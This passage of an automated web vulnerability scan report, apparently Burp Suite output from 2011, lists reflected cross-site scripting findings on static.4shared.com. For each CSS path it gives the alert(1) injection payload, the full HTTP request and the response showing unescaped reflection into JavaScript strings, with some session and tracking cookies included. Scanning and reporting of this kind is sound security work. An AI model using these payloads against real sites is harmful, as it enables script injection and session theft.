User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css658a0"-alert(1)-"488f25f19da/coolbuttons.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=982CF7DB786472C50698080400077D8F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:14 GMT
Content-Length: 36179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css658a0"-alert(1)-"488f25f19da/coolbuttons.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.67. http://static.4shared.com/css/coolbuttons.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/coolbuttons.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 476b6'-alert(1)-'2efc11cdfc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css476b6'-alert(1)-'2efc11cdfc/coolbuttons.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css476b6'-alert(1)-'2efc11cdfc/coolbuttons.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=88E8858ECC90D7691F47B75BCD8F8646.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:15 GMT
Content-Length: 36174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css476b6'-alert(1)-'2efc11cdfc/coolbuttons.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}
...[SNIP]...

1.68. http://static.4shared.com/css/coolbuttons.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/coolbuttons.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebafb"-alert(1)-"74fc1488d18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/coolbuttons.cssebafb"-alert(1)-"74fc1488d18?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/coolbuttons.cssebafb"-alert(1)-"74fc1488d18
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=272DE1FC343CD7FCD18B47BB2B44D346.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:17 GMT
Content-Length: 36190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/coolbuttons.cssebafb"-alert(1)-"74fc1488d18";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.69. http://static.4shared.com/css/coolbuttons.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/coolbuttons.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1961b'-alert(1)-'61f14808736 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/coolbuttons.css1961b'-alert(1)-'61f14808736?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/coolbuttons.css1961b'-alert(1)-'61f14808736
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BD2179B0F7DEC19F1AF6BE17E7448A69.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:18 GMT
Content-Length: 36190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
x == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/coolbuttons.css1961b'-alert(1)-'61f14808736',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.70. http://static.4shared.com/css/features.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/features.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73ff6'-alert(1)-'0395b6d38e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css73ff6'-alert(1)-'0395b6d38e/features.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css73ff6'-alert(1)-'0395b6d38e/features.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=45DB815A36EFE29F3FE843EB6A0D9E01.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:53 GMT
Content-Length: 36170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css73ff6'-alert(1)-'0395b6d38e/features.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.71. http://static.4shared.com/css/features.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/features.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d0b9"-alert(1)-"5faf4995697 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css4d0b9"-alert(1)-"5faf4995697/features.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css4d0b9"-alert(1)-"5faf4995697/features.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FFA7B8C14C0841DA4DF96AD5595073B3.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:52 GMT
Content-Length: 36175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css4d0b9"-alert(1)-"5faf4995697/features.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.72. http://static.4shared.com/css/features.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/features.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 987fe'-alert(1)-'20b8da6cdaa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/features.css987fe'-alert(1)-'20b8da6cdaa?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/features.css987fe'-alert(1)-'20b8da6cdaa
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1123467C16A9AC1289ED5B062E0242EC.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:57 GMT
Content-Length: 36164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
nBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/features.css987fe'-alert(1)-'20b8da6cdaa',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.73. http://static.4shared.com/css/features.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/features.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79d0d"-alert(1)-"e9d06030ced was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/features.css79d0d"-alert(1)-"e9d06030ced?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/features.css79d0d"-alert(1)-"e9d06030ced
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7754151BBD15078673114ABBBD9C8243.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:55 GMT
Content-Length: 36175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/features.css79d0d"-alert(1)-"e9d06030ced";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.74. http://static.4shared.com/css/indexm.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/indexm.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae0da"-alert(1)-"dfc773bc8e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssae0da"-alert(1)-"dfc773bc8e7/indexm.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssae0da"-alert(1)-"dfc773bc8e7/indexm.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8F0322F63B8CACFDC0DAC3DC1897D6ED.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:49 GMT
Content-Length: 36165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssae0da"-alert(1)-"dfc773bc8e7/indexm.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.75. http://static.4shared.com/css/indexm.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/indexm.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6224d'-alert(1)-'71aae55685a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css6224d'-alert(1)-'71aae55685a/indexm.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css6224d'-alert(1)-'71aae55685a/indexm.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CBB578745C26A4D2C9E581733740EF3D.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:50 GMT
Content-Length: 36165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css6224d'-alert(1)-'71aae55685a/indexm.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

f
...[SNIP]...

1.76. http://static.4shared.com/css/indexm.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/indexm.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ce34'-alert(1)-'2fc82178551 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/indexm.css6ce34'-alert(1)-'2fc82178551
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1C17362F5BC92C5103B471FB8A66CDEC.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:53 GMT
Content-Length: 36154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.77. http://static.4shared.com/css/indexm.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/indexm.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adf03"-alert(1)-"db77fbbc575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/indexm.cssadf03"-alert(1)-"db77fbbc575?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/indexm.cssadf03"-alert(1)-"db77fbbc575
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=39624D051F6790D250B45932474C8DCE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:52 GMT
Content-Length: 36165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/indexm.cssadf03"-alert(1)-"db77fbbc575";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.78. http://static.4shared.com/css/indexn.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/indexn.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70d42'-alert(1)-'358252ee62f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css70d42'-alert(1)-'358252ee62f/indexn.css?ver=1610 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /css70d42'-alert(1)-'358252ee62f/indexn.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C9C102B5A72C1F74B8694370A022405D.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:37:08 GMT
Content-Length: 36184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css70d42'-alert(1)-'358252ee62f/indexn.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

f
...[SNIP]...

1.79. http://static.4shared.com/css/indexn.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/indexn.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c9ed"-alert(1)-"c9db170bdcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css8c9ed"-alert(1)-"c9db170bdcd/indexn.css?ver=1610 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /css8c9ed"-alert(1)-"c9db170bdcd/indexn.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E53A1B83159954CF79DC975D021B4F60.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:37:07 GMT
Content-Length: 36184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css8c9ed"-alert(1)-"c9db170bdcd/indexn.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.80. http://static.4shared.com/css/indexn.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/indexn.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c78e"-alert(1)-"58cbf041f37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/indexn.css9c78e"-alert(1)-"58cbf041f37?ver=1610 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /css/indexn.css9c78e"-alert(1)-"58cbf041f37
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=179999491542BAC1D4F65691626D2CEE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:37:10 GMT
Content-Length: 36184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/indexn.css9c78e"-alert(1)-"58cbf041f37";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.81. http://static.4shared.com/css/indexn.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/indexn.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c767'-alert(1)-'9b399007d8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/indexn.css5c767'-alert(1)-'9b399007d8f?ver=1610 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /css/indexn.css5c767'-alert(1)-'9b399007d8f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77C202D2082F208C3FE668DFDB9A3A6F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:37:11 GMT
Content-Length: 36184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/indexn.css5c767'-alert(1)-'9b399007d8f',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.82. http://static.4shared.com/css/main.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a30e'-alert(1)-'42eda4d21a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

